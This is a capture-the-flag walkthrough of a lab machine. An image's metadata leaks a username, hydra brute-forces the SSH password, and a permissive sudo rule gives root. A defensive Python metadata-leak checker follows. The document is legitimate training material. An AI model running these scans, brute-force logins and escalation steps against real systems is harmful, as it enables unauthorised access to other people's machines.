Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 12:27 EST
Nmap scan report for 172.17.0.2
Host is up (0.000027s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 3d:fd:d7:c8:17:97:f5:12:b1:f5:11:7d:af:88:06:fe (ECDSA)
|_ 256 43:b3:ba:a9:32:c9:01:43:ee:62:d0:11:12:1d:5d:17 (ED25519)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds
If we open the page we see only an image of a Kinder egg. Fuzzing finds nothing, and brute forcing with hydra finds nothing either, so we check whether the image contains any important metadata: we download the image and use a tool to extract its metadata.
exiftool
wget http://<IP>/imagen.jpeg
exiftool imagen.jpeg
Info:
ExifTool Version Number : 13.00
File Name : imagen.jpeg
Directory : .
File Size : 19 kB
File Modification Date/Time : 2024:05:28 12:10:18-04:00
File Access Date/Time : 2025:02:06 12:31:55-05:00
File Inode Change Date/Time : 2025:02:06 12:31:55-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
XMP Toolkit : Image::ExifTool 12.76
Description : ---------- User: borazuwarah ----------
Title : ---------- Password: ----------
Image Width : 455
Image Height : 455
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 455x455
Megapixels : 0.207
As we can see, we have a username, so we will try brute forcing with that user.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-06 12:34:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: borazuwarah password: 123456
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 21 final worker threads did not complete until end.
[ERROR] 21 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-06 12:34:06
As we can see, we obtain the credentials for the user borazuwarah, so we connect over SSH as follows:
SSH
ssh borazuwarah@<IP>
We enter 123456 as the password and we are in.
Escalate Privileges
If we run sudo -l we see the following:
Matching Defaults entries for borazuwarah on 7b08259878b6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User borazuwarah may run the following commands on 7b08259878b6:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/bash
We see that we can run the bash binary as the root user, so we do the following:
sudo bash
Info:
root@fd6a0da128a8:/home/borazuwarah# whoami
root
With this we are root, so the machine is finished.
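
The username in this walkthrough leaked through the image's XMP Description field. As an added example (not part of the original writeup), this pre-publication check walks a JPEG's segments and flags credential-like text in XMP and COM metadata; the function names, the pattern list and the sample bytes are assumptions constructed for illustration.

```python
import re
import struct

XMP_HEADER = b"http://ns.adobe.com/xap/1.0/\x00"
# Credential-like labels; this pattern list is an assumption, extend it for your site.
SUSPICIOUS = re.compile(
    r"(user(?:name)?|login|pass(?:word)?|token|secret)\s*[:=]\s*([^\s<\"']*)", re.I)

def text_segments(jpeg: bytes):
    """Yield (kind, text) for XMP (APP1) and COM segments of a JPEG."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError(f"bad marker at offset {pos}")
        marker = jpeg[pos + 1]
        if marker in (0xDA, 0xD9):  # SOS / EOI: no metadata segments after this
            return
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(jpeg):
            raise ValueError(f"truncated segment at offset {pos}")
        payload = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and payload.startswith(XMP_HEADER):
            yield "XMP", payload[len(XMP_HEADER):].decode("utf-8", "replace")
        elif marker == 0xFE:
            yield "COM", payload.decode("utf-8", "replace")
        pos += 2 + length

def find_leaks(jpeg: bytes):
    """Return [(segment_kind, label, value)] for credential-like metadata."""
    return [(kind, m.group(1).lower(), m.group(2))
            for kind, text in text_segments(jpeg)
            for m in SUSPICIOUS.finditer(text)]

def segment(marker: int, payload: bytes) -> bytes:
    """Build one JPEG segment (helper used only to construct the sample)."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

# Constructed sample: a skeletal JPEG whose XMP text mirrors the Description field above.
XMP = (b"<x:xmpmeta xmlns:x='adobe:ns:meta/'><rdf:li xml:lang='x-default'>"
       b"---------- User: borazuwarah ----------</rdf:li></x:xmpmeta>")
SAMPLE = (b"\xff\xd8" + segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
          + segment(0xE1, XMP_HEADER + XMP) + b"\xff\xd9")

if __name__ == "__main__":
    for kind, label, value in find_leaks(SAMPLE):
        print(f"{kind}: {label} = {value!r}")
```

Any hit is a reason to strip the metadata before the image is served; EXIF (TIFF) fields are not parsed by this check.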